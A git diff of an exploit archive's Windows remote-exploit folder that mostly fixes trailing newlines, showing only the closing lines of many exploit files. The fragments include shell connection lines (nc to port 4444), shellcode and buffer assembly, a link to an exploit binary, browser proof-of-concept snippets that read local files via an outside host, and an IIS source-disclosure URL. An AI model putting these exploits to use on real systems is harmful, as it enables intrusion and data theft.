104c14322..93fcaac90 100755 --- a/platforms/windows/remote/18759.rb +++ b/platforms/windows/remote/18759.rb @@ -95,4 +95,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect_udp end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/18780.rb b/platforms/windows/remote/18780.rb index bdc229eef..7e95d86ad 100755 --- a/platforms/windows/remote/18780.rb +++ b/platforms/windows/remote/18780.rb @@ -303,4 +303,4 @@ class Metasploit3 < Msf::Exploit::Remote end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/18818.py b/platforms/windows/remote/18818.py index 3a1329f9f..b07553a1f 100755 --- a/platforms/windows/remote/18818.py +++ b/platforms/windows/remote/18818.py @@ -108,4 +108,4 @@ resp = opener.open("http://%s:9000/%s" % (rhost,filename)) print "[*] Check your shell on %s %s\n" % (lhost,lport) # 01010011 01101100 01100101 01100101 01110000 01101001 01110011 01101111 -# 01110110 01100101 01110010 01110010 01100001 01110100 01100101 01100100 +# 01110110 01100101 01110010 01110010 01100001 01110100 01100101 01100100 \ No newline at end of file diff --git a/platforms/windows/remote/18825.rb b/platforms/windows/remote/18825.rb index a60577764..67b044347 100755 --- a/platforms/windows/remote/18825.rb +++ b/platforms/windows/remote/18825.rb @@ -211,4 +211,4 @@ class Metasploit3 < Msf::Exploit::Remote print_status("Sending malicious page") send_response( cli, html, {'Content-Type' => 'text/html'} ) end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/18847.rb b/platforms/windows/remote/18847.rb index 2c8263ad1..4cc2d0164 100755 --- a/platforms/windows/remote/18847.rb +++ b/platforms/windows/remote/18847.rb @@ -343,4 +343,4 @@ class Metasploit3 < Msf::Exploit::Remote end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/1885.pl b/platforms/windows/remote/1885.pl index 962d4ce8c..de6ae7227 100755 --- a/platforms/windows/remote/1885.pl +++ b/platforms/windows/remote/1885.pl @@ -76,4 +76,4 @@ while (<$sock>) { print; } -# milw0rm.com [2006-06-07] +# milw0rm.com [2006-06-07] \ No newline at end of file diff --git a/platforms/windows/remote/18866.rb b/platforms/windows/remote/18866.rb index 8e92ffa60..fcb2b91cc 100755 --- a/platforms/windows/remote/18866.rb +++ b/platforms/windows/remote/18866.rb @@ -103,4 +103,4 @@ class Metasploit3 < Msf::Exploit::Remote print_status("#{peer} - Uploading .mof...") upload("#{levels}WINDOWS\\system32\\wbem\\mof\\#{mof_name}", mof) end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/18870.rb b/platforms/windows/remote/18870.rb index 3605da6e5..b8795165d 100755 --- a/platforms/windows/remote/18870.rb +++ b/platforms/windows/remote/18870.rb @@ -402,5 +402,4 @@ class Metasploit3 < Msf::Exploit::Remote end -end - +end \ No newline at end of file diff --git a/platforms/windows/remote/18897.rb b/platforms/windows/remote/18897.rb index 60f057a9a..9a7db9fd4 100755 --- a/platforms/windows/remote/18897.rb +++ b/platforms/windows/remote/18897.rb @@ -187,4 +187,4 @@ class Metasploit3 < Msf::Exploit::Remote end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/189.c b/platforms/windows/remote/189.c index 23cc62280..e5fdd836e 100755 --- a/platforms/windows/remote/189.c +++ b/platforms/windows/remote/189.c @@ -67,4 +67,4 @@ int main(int argc, char **argv){ } -// milw0rm.com [2000-11-18] +// milw0rm.com [2000-11-18] \ No newline at end of file diff --git a/platforms/windows/remote/18929.rb b/platforms/windows/remote/18929.rb index 71f767f01..ee70c6d8a 100755 --- a/platforms/windows/remote/18929.rb +++ b/platforms/windows/remote/18929.rb @@ -83,4 +83,4 @@ class Metasploit3 < Msf::Exploit::Remote 'uri' => "/?#{buf}" }) end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/18933.rb b/platforms/windows/remote/18933.rb index 44316a95f..b432a3cc4 100755 --- a/platforms/windows/remote/18933.rb +++ b/platforms/windows/remote/18933.rb @@ -163,4 +163,4 @@ class Metasploit3 < Msf::Exploit::Remote end end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/18967.rb b/platforms/windows/remote/18967.rb index ea77c5f11..8956e9564 100755 --- a/platforms/windows/remote/18967.rb +++ b/platforms/windows/remote/18967.rb @@ -116,4 +116,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect_udp end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/18968.rb b/platforms/windows/remote/18968.rb index 0090fb4df..cff064ab9 100755 --- a/platforms/windows/remote/18968.rb +++ b/platforms/windows/remote/18968.rb @@ -118,4 +118,4 @@ class Metasploit3 < Msf::Exploit::Remote handler disconnect_udp end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/18969.rb b/platforms/windows/remote/18969.rb index f0d9b29eb..d1bee4a88 100755 --- a/platforms/windows/remote/18969.rb +++ b/platforms/windows/remote/18969.rb @@ -115,4 +115,4 @@ class Metasploit3 < Msf::Exploit::Remote handler disconnect_udp end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/18973.rb b/platforms/windows/remote/18973.rb index eebaa7a6d..e5a0e195a 100755 --- a/platforms/windows/remote/18973.rb +++ b/platforms/windows/remote/18973.rb @@ -153,4 +153,4 @@ cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000206 script_fu+0xc86d: 0040c86d ffd2 call edx {42424242} -=end +=end \ No newline at end of file diff --git a/platforms/windows/remote/18986.rb b/platforms/windows/remote/18986.rb index 49494de17..f55f807d3 100755 --- a/platforms/windows/remote/18986.rb +++ b/platforms/windows/remote/18986.rb @@ -130,4 +130,4 @@ buffer << "\x90" buffer << egghunter buffer << "\x90" * (59 - egghunter.length) print "buffer length: #{buffer.length}\r\n" -s.puts(buffer) +s.puts(buffer) \ No newline at end of file diff --git a/platforms/windows/remote/19002.rb b/platforms/windows/remote/19002.rb index 2326b81c9..7bc260c22 100755 --- a/platforms/windows/remote/19002.rb +++ b/platforms/windows/remote/19002.rb @@ -180,5 +180,4 @@ class Metasploit3 < Msf::Exploit::Remote return vsd end -end - +end \ No newline at end of file diff --git a/platforms/windows/remote/19025.rb b/platforms/windows/remote/19025.rb index e10bda654..f2bd531eb 100755 --- a/platforms/windows/remote/19025.rb +++ b/platforms/windows/remote/19025.rb @@ -94,4 +94,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/19026.rb b/platforms/windows/remote/19026.rb index 861a08048..2f61d8b77 100755 --- a/platforms/windows/remote/19026.rb +++ b/platforms/windows/remote/19026.rb @@ -103,4 +103,4 @@ class Metasploit3 < Msf::Exploit::Remote handler end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/19027.rb b/platforms/windows/remote/19027.rb index 3b3c0992f..bd1a95424 100755 --- a/platforms/windows/remote/19027.rb +++ b/platforms/windows/remote/19027.rb @@ -158,5 +158,4 @@ class Metasploit3 < Msf::Exploit::Remote end -end - +end \ No newline at end of file diff --git a/platforms/windows/remote/19033.txt b/platforms/windows/remote/19033.txt index ca2a7d526..34e980ed1 100755 --- a/platforms/windows/remote/19033.txt +++ b/platforms/windows/remote/19033.txt @@ -73,4 +73,4 @@ Example: Default.aspx/.php Cheerio and signed, -/Kingcope +/Kingcope \ No newline at end of file diff --git a/platforms/windows/remote/1906.py b/platforms/windows/remote/1906.py index 73d10a525..46fba89b8 100755 --- a/platforms/windows/remote/1906.py +++ b/platforms/windows/remote/1906.py @@ -62,4 +62,4 @@ s.close() #EoF -# milw0rm.com [2006-06-12] +# milw0rm.com [2006-06-12] \ No newline at end of file diff --git a/platforms/windows/remote/191.pl b/platforms/windows/remote/191.pl index 333cfe40b..36454b3a9 100755 --- a/platforms/windows/remote/191.pl +++ b/platforms/windows/remote/191.pl @@ -74,4 +74,4 @@ close(LOG); exit; -# milw0rm.com [2000-11-18] +# milw0rm.com [2000-11-18] \ No newline at end of file diff --git a/platforms/windows/remote/19131.py b/platforms/windows/remote/19131.py index 036f8adc0..bf3eee250 100755 --- a/platforms/windows/remote/19131.py +++ b/platforms/windows/remote/19131.py @@ -308,4 +308,4 @@ try: system("nc -v %s 4444" % host) except: print("(-) Exploit failed! check if the target service is up") - sys.exit(0) + sys.exit(0) \ No newline at end of file diff --git a/platforms/windows/remote/1915.pm b/platforms/windows/remote/1915.pm index 88a00e5be..0e262d846 100755 --- a/platforms/windows/remote/1915.pm +++ b/platforms/windows/remote/1915.pm @@ -116,4 +116,4 @@ $self->PrintLine(sprintf("[*] Exploit complete")); return; } -# milw0rm.com [2006-06-15] +# milw0rm.com [2006-06-15] \ No newline at end of file diff --git a/platforms/windows/remote/19152.txt b/platforms/windows/remote/19152.txt index 62c2c4169..6b9b41703 100755 --- a/platforms/windows/remote/19152.txt +++ b/platforms/windows/remote/19152.txt @@ -6,5 +6,4 @@ This can happen if the file is referenced as the target of the GET or passed in Example: -CGI Error The specified CGI application misbehaved by not returning a complete set of HTTP headers. The headers it did return are: Can't open perl script "C:\InetPub\scripts\ bogus.pl": No such file or directory - +CGI Error The specified CGI application misbehaved by not returning a complete set of HTTP headers. The headers it did return are: Can't open perl script "C:\InetPub\scripts\ bogus.pl": No such file or directory \ No newline at end of file diff --git a/platforms/windows/remote/19177.rb b/platforms/windows/remote/19177.rb index 271d30646..8fde43c9b 100755 --- a/platforms/windows/remote/19177.rb +++ b/platforms/windows/remote/19177.rb @@ -199,4 +199,4 @@ class Metasploit3 < Msf::Exploit::Remote end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/19197.txt b/platforms/windows/remote/19197.txt index d8ad0ab5b..0a304535c 100755 --- a/platforms/windows/remote/19197.txt +++ b/platforms/windows/remote/19197.txt @@ -71,6 +71,4 @@ SVAL(inbuf,smb_err) == ERRbadpw))) + #endif got_pass = False; DEBUG(3,("resending login\n")); -goto get_pass; - - +goto get_pass; \ No newline at end of file diff --git a/platforms/windows/remote/192.pl b/platforms/windows/remote/192.pl index 5612450d8..7cfafbd74 100755 --- a/platforms/windows/remote/192.pl +++ b/platforms/windows/remote/192.pl @@ -62,4 +62,4 @@ sub sendraw { # this saves the whole transaction anyway # Spidermark: sensepostdata -# milw0rm.com [2000-11-18] +# milw0rm.com [2000-11-18] \ No newline at end of file diff --git a/platforms/windows/remote/19224.c b/platforms/windows/remote/19224.c index ba801436c..1cd78f35b 100755 --- a/platforms/windows/remote/19224.c +++ b/platforms/windows/remote/19224.c @@ -265,5 +265,4 @@ main (int argc, char *argv[]) #endif CLOSE(sock); exit(1); -} - +} \ No newline at end of file diff --git a/platforms/windows/remote/19231.rb b/platforms/windows/remote/19231.rb index da5b7729f..c430daa9c 100755 --- a/platforms/windows/remote/19231.rb +++ b/platforms/windows/remote/19231.rb @@ -117,5 +117,4 @@ class Metasploit3 < Msf::Exploit::Remote handler end -end - +end \ No newline at end of file diff --git a/platforms/windows/remote/19246.pm b/platforms/windows/remote/19246.pm index 7d2de8e87..8ed8fa9b5 100755 --- a/platforms/windows/remote/19246.pm +++ b/platforms/windows/remote/19246.pm @@ -111,5 +111,4 @@ sub Exploit $s->Send($request); $s->Close(); return; -} - +} \ No newline at end of file diff --git a/platforms/windows/remote/19248.c b/platforms/windows/remote/19248.c index b89c734b8..35123d1b8 100755 --- a/platforms/windows/remote/19248.c +++ b/platforms/windows/remote/19248.c @@ -133,5 +133,4 @@ void main(int argc, char **argv) } closesocket(s); } -} - +} \ No newline at end of file diff --git a/platforms/windows/remote/19266.py b/platforms/windows/remote/19266.py index 4f61740c4..5fcf213ef 100755 --- a/platforms/windows/remote/19266.py +++ b/platforms/windows/remote/19266.py @@ -182,4 +182,4 @@ while a < 3: crash() sys.exit() else: - print "[-] Oh plz.. pick the right one :)\r\n" + print "[-] Oh plz.. pick the right one :)\r\n" \ No newline at end of file diff --git a/platforms/windows/remote/19288.py b/platforms/windows/remote/19288.py index 02fb513ee..4c7b7feda 100755 --- a/platforms/windows/remote/19288.py +++ b/platforms/windows/remote/19288.py @@ -89,4 +89,4 @@ while 1: print data else: break -s.close() +s.close() \ No newline at end of file diff --git a/platforms/windows/remote/19291.rb b/platforms/windows/remote/19291.rb index 1a0c3903a..0261f6812 100755 --- a/platforms/windows/remote/19291.rb +++ b/platforms/windows/remote/19291.rb @@ -86,4 +86,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/19295.rb b/platforms/windows/remote/19295.rb index d393089d4..2a11165b0 100755 --- a/platforms/windows/remote/19295.rb +++ b/platforms/windows/remote/19295.rb @@ -175,4 +175,4 @@ class Metasploit3 < Msf::Exploit::Remote print_status("Sending #{self.name} HTML") send_response(cli, html, { 'Content-Type' => 'text/html' }) end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/19322.rb b/platforms/windows/remote/19322.rb index a1e3c6693..63a693d23 100755 --- a/platforms/windows/remote/19322.rb +++ b/platforms/windows/remote/19322.rb @@ -216,4 +216,4 @@ class Metasploit3 < Msf::Exploit::Remote end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/19361.txt b/platforms/windows/remote/19361.txt index c487045f4..d07dc5f7b 100755 --- a/platforms/windows/remote/19361.txt +++ b/platforms/windows/remote/19361.txt @@ -5,5 +5,4 @@ This vulnerability could allow a web site viewer to obtain the source code for . IIS checks the extension of the requested file to see if it needs to do any processing before delivering the information. If the requested extension is not on it's list, it then makes any language-based calculations, and delivers the file. If a single byte is appended to the end of the URL when IIS to set to use one of the double-byte language packs (Chinese, Japanese, or Korean) the language module will strip it as invalid, then look for the file. Since the new URL now points to a valid filename, and IIS has already determined that this transaction requires no processing, the file is simply delivered as is, exposing the source code. -Request a URL of a known-good file that requires server processing, then append a hex value between x81 and xfe to the URL. For example: . If your server is vulnerable you will receive back the source code of your .asp file. - +Request a URL of a known-good file that requires server processing, then append a hex value between x81 and xfe to the URL. For example: . If your server is vulnerable you will receive back the source code of your .asp file. \ No newline at end of file diff --git a/platforms/windows/remote/19369.rb b/platforms/windows/remote/19369.rb index da779130e..01130d5cb 100755 --- a/platforms/windows/remote/19369.rb +++ b/platforms/windows/remote/19369.rb @@ -487,4 +487,4 @@ Flash32_11_2_202_228!DllUnregisterServer+0x300e84: 104b1b30 53 push ebx 104b1b31 ffd0 call eax -=end +=end \ No newline at end of file diff --git a/platforms/windows/remote/19387.rb b/platforms/windows/remote/19387.rb index 0149d1bd6..4e24283d8 100755 --- a/platforms/windows/remote/19387.rb +++ b/platforms/windows/remote/19387.rb @@ -278,4 +278,4 @@ WARNING: Stack unwind information not available. Following frames may be wrong. State 00001000 MEM_COMMIT Usage RegionUsageStack Pid.Tid d1c.d0c -=end +=end \ No newline at end of file diff --git a/platforms/windows/remote/1940.pm b/platforms/windows/remote/1940.pm index 7e9c572bc..4d01cb916 100755 --- a/platforms/windows/remote/1940.pm +++ b/platforms/windows/remote/1940.pm @@ -200,4 +200,4 @@ sub Exploit { 1; -# milw0rm.com [2006-06-22] +# milw0rm.com [2006-06-22] \ No newline at end of file diff --git a/platforms/windows/remote/19407.py b/platforms/windows/remote/19407.py index e64611a4e..61adec22d 100755 --- a/platforms/windows/remote/19407.py +++ b/platforms/windows/remote/19407.py @@ -86,5 +86,4 @@ time.sleep(5) print "password packet..." s.send(init4) # send the data -s.close() - +s.close() \ No newline at end of file diff --git a/platforms/windows/remote/19424.pl b/platforms/windows/remote/19424.pl index 8dc010702..348b76bc1 100755 --- a/platforms/windows/remote/19424.pl +++ b/platforms/windows/remote/19424.pl @@ -639,5 +639,4 @@ print "Machine name: $results[$base+6]\n";} # # I wish I could really name everyone, but I can't. Don't feel slighted if # your not on the list... :) -############################################################################## - +############################################################################## \ No newline at end of file diff --git a/platforms/windows/remote/19448.c b/platforms/windows/remote/19448.c index fb5e5cd46..fd775a98f 100755 --- a/platforms/windows/remote/19448.c +++ b/platforms/windows/remote/19448.c @@ -254,5 +254,4 @@ char *argv[]; sprintf(xx2,"257 \"%s\" is current directory.\x0d\x0a",xxx); sock_write(sock,xx2,strlen(xx2)); sock_gets(sock,buffer,1024); -} - +} \ No newline at end of file diff --git a/platforms/windows/remote/19449.c b/platforms/windows/remote/19449.c index b36bc66c8..41a176aff 100755 --- a/platforms/windows/remote/19449.c +++ b/platforms/windows/remote/19449.c @@ -133,5 +133,4 @@ int main(int argc, char *argv[]) }else close(cli_sock); } -} - +} \ No newline at end of file diff --git a/platforms/windows/remote/19450.c b/platforms/windows/remote/19450.c index 15c1edc05..a4e87df22 100755 --- a/platforms/windows/remote/19450.c +++ b/platforms/windows/remote/19450.c @@ -82,5 +82,4 @@ main(int argc,char *argv[]) fwrite(HEADER2,1,strlen(HEADER2),fp); fclose(fp); -} - +} \ No newline at end of file diff --git a/platforms/windows/remote/19484.rb b/platforms/windows/remote/19484.rb index 53ee37e9d..162d110a8 100755 --- a/platforms/windows/remote/19484.rb +++ b/platforms/windows/remote/19484.rb @@ -271,4 +271,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/19486.c b/platforms/windows/remote/19486.c index 0547d8e88..b5a1a80e1 100755 --- a/platforms/windows/remote/19486.c +++ b/platforms/windows/remote/19486.c @@ -86,6 +86,4 @@ main( void ) printf( "\n\n\n" ); return( 0 ); -} - - +} \ No newline at end of file diff --git a/platforms/windows/remote/19487.txt b/platforms/windows/remote/19487.txt index 730a5333f..7740cde24 100755 --- a/platforms/windows/remote/19487.txt +++ b/platforms/windows/remote/19487.txt @@ -31,4 +31,4 @@ expstr = expstr + Chr(202) + Chr(212) + Chr(248) + Chr(191) 'Call exploitable method (MSInfoLoadFile) eye.MSInfoLoadFile(expstr) ---> +--> \ No newline at end of file diff --git a/platforms/windows/remote/19494.c b/platforms/windows/remote/19494.c index 3d6da5997..fda6839ff 100755 --- a/platforms/windows/remote/19494.c +++ b/platforms/windows/remote/19494.c @@ -102,4 +102,4 @@ int main(int argc,char *argv[]) close(sockfd); } -------------------- +------------------- \ No newline at end of file diff --git a/platforms/windows/remote/19495.c b/platforms/windows/remote/19495.c index df89e0caa..8600aeb76 100755 --- a/platforms/windows/remote/19495.c +++ b/platforms/windows/remote/19495.c @@ -102,4 +102,4 @@ int main(int argc,char *argv[]) close(sockfd); } -------------------- +------------------- \ No newline at end of file diff --git a/platforms/windows/remote/19496.c b/platforms/windows/remote/19496.c index b2023e5bd..07e18c42d 100755 --- a/platforms/windows/remote/19496.c +++ b/platforms/windows/remote/19496.c @@ -95,5 +95,4 @@ int main(int argc,char *argv[]) close(sockfd); } -------------------- - +------------------- \ No newline at end of file diff --git a/platforms/windows/remote/19514.txt b/platforms/windows/remote/19514.txt index 0f6444aa3..14f572aaa 100755 --- a/platforms/windows/remote/19514.txt +++ b/platforms/windows/remote/19514.txt @@ -76,4 +76,4 @@ expstr = expstr + "CALC.EXE" 'Call exploitable method pdf.setview(expstr) ---> +--> \ No newline at end of file diff --git a/platforms/windows/remote/19515.txt b/platforms/windows/remote/19515.txt index 1ddd92014..4da6e7199 100755 --- a/platforms/windows/remote/19515.txt +++ b/platforms/windows/remote/19515.txt @@ -81,4 +81,4 @@ expstr = expstr + "CALC.EXE" setupctl.DistUnit = expstr setupctl.InstallNow ---> +--> \ No newline at end of file diff --git a/platforms/windows/remote/19521.txt b/platforms/windows/remote/19521.txt index b7293e05c..0c2fa8fdd 100755 --- a/platforms/windows/remote/19521.txt +++ b/platforms/windows/remote/19521.txt @@ -63,5 +63,4 @@ AAAAAAAAAAAAAAAAAAAA" 'Call exploitable method, note the valid help file hhopen.OpenHelp "Winhlp32.hlp", expstr ---> - +--> \ No newline at end of file diff --git a/platforms/windows/remote/19530.txt b/platforms/windows/remote/19530.txt index 3a45b59ff..97315a625 100755 --- a/platforms/windows/remote/19530.txt +++ b/platforms/windows/remote/19530.txt @@ -38,4 +38,4 @@ alert ("Here is your file:\n"+s); HREF="javascript:oD.startDownload('http://www.nat.bg/~joro/reject.cgi?autoexec', doit)">Click here to read C:\AUTOEXEC.BAT. - + \ No newline at end of file diff --git a/platforms/windows/remote/19559.txt b/platforms/windows/remote/19559.txt index 90acd38fd..01780dda0 100755 --- a/platforms/windows/remote/19559.txt +++ b/platforms/windows/remote/19559.txt @@ -23,4 +23,4 @@ alert("Create a short text file C:\\TEST.TXT and it will be read and shown in a a=window.open("file://c:/test.txt"); a.location="http://www.nat.bg/~joro/reject.cgi?jsredir1"; -// "http://www.nat.bg/~joro/reject.cgi?jsredir1" just does a HTTP redirect to: "javascript:alert(document.body.innerText)" +// "http://www.nat.bg/~joro/reject.cgi?jsredir1" just does a HTTP redirect to: "javascript:alert(document.body.innerText)" \ No newline at end of file diff --git a/platforms/windows/remote/19566.c b/platforms/windows/remote/19566.c index e2df5ded8..9e4fd1437 100755 --- a/platforms/windows/remote/19566.c +++ b/platforms/windows/remote/19566.c @@ -121,10 +121,4 @@ main(int argc,char *argv[]) closesocket(sock); printf("Done.\n"); return FALSE; -} - - - - - - +} \ No newline at end of file diff --git a/platforms/windows/remote/19584.c b/platforms/windows/remote/19584.c index e4e9c7cfe..fe264bf30 100755 --- a/platforms/windows/remote/19584.c +++ b/platforms/windows/remote/19584.c @@ -99,23 +99,4 @@ memcpy(buf+JMPADR-strlen(exploit_code)-1,exploit_code,strlen(exploit_code)); closesocket(sock); printf("Done.\n"); return FALSE; -} - - - - - - - - - - - - - - - - - - - +} \ No newline at end of file diff --git a/platforms/windows/remote/19586.c b/platforms/windows/remote/19586.c index 21456b792..27705eebd 100755 --- a/platforms/windows/remote/19586.c +++ b/platforms/windows/remote/19586.c @@ -126,4 +126,4 @@ main(int argc,char *argv[]) closesocket(sock); printf("Done.\n"); return FALSE; -} +} \ No newline at end of file diff --git a/platforms/windows/remote/19588.c b/platforms/windows/remote/19588.c index 4bf6744b4..987ef6cab 100755 --- a/platforms/windows/remote/19588.c +++ b/platforms/windows/remote/19588.c @@ -102,5 +102,4 @@ int PASCAL WinMain(HINSTANCE hInst, HINSTANCE hInstPrev, LPSTR pszCmdLine, int C fprintf(fp,"\">"); fclose(fp); return FALSE; -} - +} \ No newline at end of file diff --git a/platforms/windows/remote/19592.asm b/platforms/windows/remote/19592.asm index f3674649a..f55e60277 100755 --- a/platforms/windows/remote/19592.asm +++ b/platforms/windows/remote/19592.asm @@ -440,7 +440,4 @@ write_console proc text_out:dword, text_len:dword ret endp -end start - - - +end start \ No newline at end of file diff --git a/platforms/windows/remote/19593.c b/platforms/windows/remote/19593.c index 1ef3e501e..0d84e70e9 100755 --- a/platforms/windows/remote/19593.c +++ b/platforms/windows/remote/19593.c @@ -554,4 +554,4 @@ done: return (fd); -} +} \ No newline at end of file diff --git a/platforms/windows/remote/19595.c b/platforms/windows/remote/19595.c index 9f747044e..e06e2f403 100755 --- a/platforms/windows/remote/19595.c +++ b/platforms/windows/remote/19595.c @@ -92,4 +92,4 @@ main(int argc, char *argv[]) } else if (argc==3) overwrite(argv[1],argv[2],80); else overwrite(argv[1],argv[2],atoi(argv[3])); -} +} \ No newline at end of file diff --git a/platforms/windows/remote/19603.txt b/platforms/windows/remote/19603.txt index b776ec490..0d45fda34 100755 --- a/platforms/windows/remote/19603.txt +++ b/platforms/windows/remote/19603.txt @@ -324,4 +324,4 @@ source: http://www.securityfocus.com/bid/775/info PS: Although I would love to hear from you, please DO NOT bomb me with mail ;) Please keep your discussions on this topic on BUGTRAQ as much as you can. You can get all the information you need in this document and by following the links given above. Cheers! - Mukund + Mukund \ No newline at end of file diff --git a/platforms/windows/remote/19608.c b/platforms/windows/remote/19608.c index ff8b3abe8..deeee2144 100755 --- a/platforms/windows/remote/19608.c +++ b/platforms/windows/remote/19608.c @@ -57,4 +57,4 @@ main(int argc,char *argv[]) fclose(fp); printf("%s created.\n",argv[1]); return FALSE; -} +} \ No newline at end of file diff --git a/platforms/windows/remote/19612.pl b/platforms/windows/remote/19612.pl index b3d1137ff..225d5c61a 100755 --- a/platforms/windows/remote/19612.pl +++ b/platforms/windows/remote/19612.pl @@ -44,5 +44,4 @@ while (1) { $line = <$mysock>; print $line; close $mysock; -} - +} \ No newline at end of file diff --git a/platforms/windows/remote/19613.rb b/platforms/windows/remote/19613.rb index a68ea3b09..218bbf351 100755 --- a/platforms/windows/remote/19613.rb +++ b/platforms/windows/remote/19613.rb @@ -179,4 +179,4 @@ end (1) Poison Ivy fails to run on DEP enabled systems (maybe due to the unpacking process) (2) When trying a unpacked version on DEP enabled systems windows/exec payload runs, but not meterpreter -=end +=end \ No newline at end of file diff --git a/platforms/windows/remote/19614.asm b/platforms/windows/remote/19614.asm index 74853b655..6b7bb614e 100755 --- a/platforms/windows/remote/19614.asm +++ b/platforms/windows/remote/19614.asm @@ -606,4 +606,4 @@ endp end start -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/19614.exe +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/19614.exe \ No newline at end of file diff --git a/platforms/windows/remote/19621.c b/platforms/windows/remote/19621.c index c8ef19cc6..5ff3d0b9b 100755 --- a/platforms/windows/remote/19621.c +++ b/platforms/windows/remote/19621.c @@ -71,5 +71,4 @@ main(int argc, char *argv[]) fprintf(fp,"Subject: subscribe exploit\n"); fprintf(fp,"%s",HD2); fclose(fp); -} - +} \ No newline at end of file diff --git a/platforms/windows/remote/19625.py b/platforms/windows/remote/19625.py index bf2c5c199..9bb7e2bef 100755 --- a/platforms/windows/remote/19625.py +++ b/platforms/windows/remote/19625.py @@ -140,5 +140,4 @@ shellcode =( payload = buffer + stackAdjust + rop + shellcode rest = 1765 - len(payload) exploit = payload + "\xCC" * rest -# Send exploit to target's port 888 - +# Send exploit to target's port 888 \ No newline at end of file diff --git a/platforms/windows/remote/1965.pm b/platforms/windows/remote/1965.pm index 282d6ec9b..eedefe55f 100755 --- a/platforms/windows/remote/1965.pm +++ b/platforms/windows/remote/1965.pm @@ -257,4 +257,4 @@ sub Exploit { 1; -# milw0rm.com [2006-06-29] +# milw0rm.com [2006-06-29] \ No newline at end of file diff --git a/platforms/windows/remote/19689.c b/platforms/windows/remote/19689.c index 7a51a438c..f6952984d 100755 --- a/platforms/windows/remote/19689.c +++ b/platforms/windows/remote/19689.c @@ -132,9 +132,4 @@ int main (int argc, char *argv[]) { write(sock,"\n\n", 2); printf("done.\n\n"); -} - - - - - +} \ No newline at end of file diff --git a/platforms/windows/remote/19718.rb b/platforms/windows/remote/19718.rb index b0bd7021a..e8f0eed96 100755 --- a/platforms/windows/remote/19718.rb +++ b/platforms/windows/remote/19718.rb @@ -164,4 +164,4 @@ class Metasploit3 < Msf::Exploit::Remote print_status("Sending #{self.name}") send_response(cli, html, { 'Content-Type' => 'text/html' }) end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/19719.txt b/platforms/windows/remote/19719.txt index b2b7e2bdc..535740777 100755 --- a/platforms/windows/remote/19719.txt +++ b/platforms/windows/remote/19719.txt @@ -18,4 +18,4 @@ setTimeout("document.links[0].click()",2000); ---------------------------------------------------------------------- +--------------------------------------------------------------------- \ No newline at end of file diff --git a/platforms/windows/remote/19730.c b/platforms/windows/remote/19730.c index 302bb4957..6f1718afb 100755 --- a/platforms/windows/remote/19730.c +++ b/platforms/windows/remote/19730.c @@ -157,4 +157,4 @@ int main(int argc, char* argv[]) fprintf(stderr, "error %d\n", err); } return 0; -} +} \ No newline at end of file diff --git a/platforms/windows/remote/19731.c b/platforms/windows/remote/19731.c index ae977c3ab..e9c6da39e 100755 --- a/platforms/windows/remote/19731.c +++ b/platforms/windows/remote/19731.c @@ -46,4 +46,4 @@ int main(int argc, char **argv) puts(request); exit(0); -} +} \ No newline at end of file diff --git a/platforms/windows/remote/19737.c b/platforms/windows/remote/19737.c index 493d88dd9..8062cadbf 100755 --- a/platforms/windows/remote/19737.c +++ b/platforms/windows/remote/19737.c @@ -212,4 +212,4 @@ JMPESP_2) pretadr=p; closesocket(sock); printf("Done.\n"); return FALSE; -} +} \ No newline at end of file diff --git a/platforms/windows/remote/19830.txt b/platforms/windows/remote/19830.txt index ba0af9a9b..a6923cd80 100755 --- a/platforms/windows/remote/19830.txt +++ b/platforms/windows/remote/19830.txt @@ -8,5 +8,4 @@ This is possible on any machine with Index Server installed, even those with no Requesting a URL like the following will return the source of default.asp on a vulnerable system: -http://target/null.htw?CiWebHitsFile=/default.asp%20&CiRestriction=none&CiHiliteType=Full - +http://target/null.htw?CiWebHitsFile=/default.asp%20&CiRestriction=none&CiHiliteType=Full \ No newline at end of file diff --git a/platforms/windows/remote/19845.pl b/platforms/windows/remote/19845.pl index 3e4364074..4cebf6ac2 100755 --- a/platforms/windows/remote/19845.pl +++ b/platforms/windows/remote/19845.pl @@ -79,7 +79,4 @@ sub sendraw { print $pstr; my @in=; select(STDOUT); close(S); return @in; - } else { die("Can't connect...\n"); }} - - - + } else { die("Can't connect...\n"); }} \ No newline at end of file diff --git a/platforms/windows/remote/19857.rb b/platforms/windows/remote/19857.rb index df63f6d6b..6afe41c36 100755 --- a/platforms/windows/remote/19857.rb +++ b/platforms/windows/remote/19857.rb @@ -122,4 +122,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/19931.rb b/platforms/windows/remote/19931.rb index c9ca785e8..af076ab35 100755 --- a/platforms/windows/remote/19931.rb +++ b/platforms/windows/remote/19931.rb @@ -127,4 +127,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/19932.rb b/platforms/windows/remote/19932.rb index d03c47c1a..330380aa4 100755 --- a/platforms/windows/remote/19932.rb +++ b/platforms/windows/remote/19932.rb @@ -127,4 +127,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/19937.pl 